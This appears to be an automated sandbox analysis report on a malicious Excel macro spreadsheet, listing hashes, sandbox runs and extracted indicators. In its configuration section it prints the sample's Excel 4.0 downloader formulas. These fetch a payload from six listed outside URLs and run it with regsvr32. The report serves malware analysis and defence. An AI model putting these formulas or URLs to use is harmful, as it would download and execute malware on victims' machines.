Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
General
-
Target
af2a4a5908dae03f4a7e479a7a965497483dd4e99d1744367ad986cf8a63a4c5
-
Size
48KB
-
Sample
241111-13jyaswret
-
MD5
ea630071369fb92e49d1a08a0f80698b
-
SHA1
937216417a51e962cee42f5ba3863fb18f83f342
-
SHA256
af2a4a5908dae03f4a7e479a7a965497483dd4e99d1744367ad986cf8a63a4c5
-
SHA512
dce3ab19592942b5f719b4d60ec6928547e6b37f2319a76cc849e574399e62299e8d8e126726957413bf36db6d1c6cc4005d139c77424cdccb2a3dd8768fd51f
-
SSDEEP
768:nO+CAEWvxRc3mlkKDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0AOBAa:n7O2b8QkKDNck01u/R2rZyjtBl
Behavioral task
behavioral1
Sample
af2a4a5908dae03f4a7e479a7a965497483dd4e99d1744367ad986cf8a63a4c5.xlsm
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
af2a4a5908dae03f4a7e479a7a965497483dd4e99d1744367ad986cf8a63a4c5.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
http://suleyera.com/components/CNGhltc5v2K6/
http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/
http://moveit.savvyint.com/config/DsfssbO7BYG/
https://schwizer.net/styled/D0MG/
http://shabeerpv.atwebpages.com/css/ww6if1YAsMpjpuGz/
http://shimal.atwebpages.com/wp-content/xkaRkHr/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://suleyera.com/components/CNGhltc5v2K6/","..\ax.ocx",0,0) =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/","..\ax.ocx",0,0)) =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveit.savvyint.com/config/DsfssbO7BYG/","..\ax.ocx",0,0)) =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://schwizer.net/styled/D0MG/","..\ax.ocx",0,0)) =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shabeerpv.atwebpages.com/css/ww6if1YAsMpjpuGz/","..\ax.ocx",0,0)) =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shimal.atwebpages.com/wp-content/xkaRkHr/","..\ax.ocx",0,0)) =IF('LGGDGB'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ax.ocx") =RETURN()
Extracted
http://suleyera.com/components/CNGhltc5v2K6/
http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/
Targets
-
-
Target
af2a4a5908dae03f4a7e479a7a965497483dd4e99d1744367ad986cf8a63a4c5
-
Size
48KB
-
MD5
ea630071369fb92e49d1a08a0f80698b
-
SHA1
937216417a51e962cee42f5ba3863fb18f83f342
-
SHA256
af2a4a5908dae03f4a7e479a7a965497483dd4e99d1744367ad986cf8a63a4c5
-
SHA512
dce3ab19592942b5f719b4d60ec6928547e6b37f2319a76cc849e574399e62299e8d8e126726957413bf36db6d1c6cc4005d139c77424cdccb2a3dd8768fd51f
-
SSDEEP
768:nO+CAEWvxRc3mlkKDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0AOBAa:n7O2b8QkKDNck01u/R2rZyjtBl
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-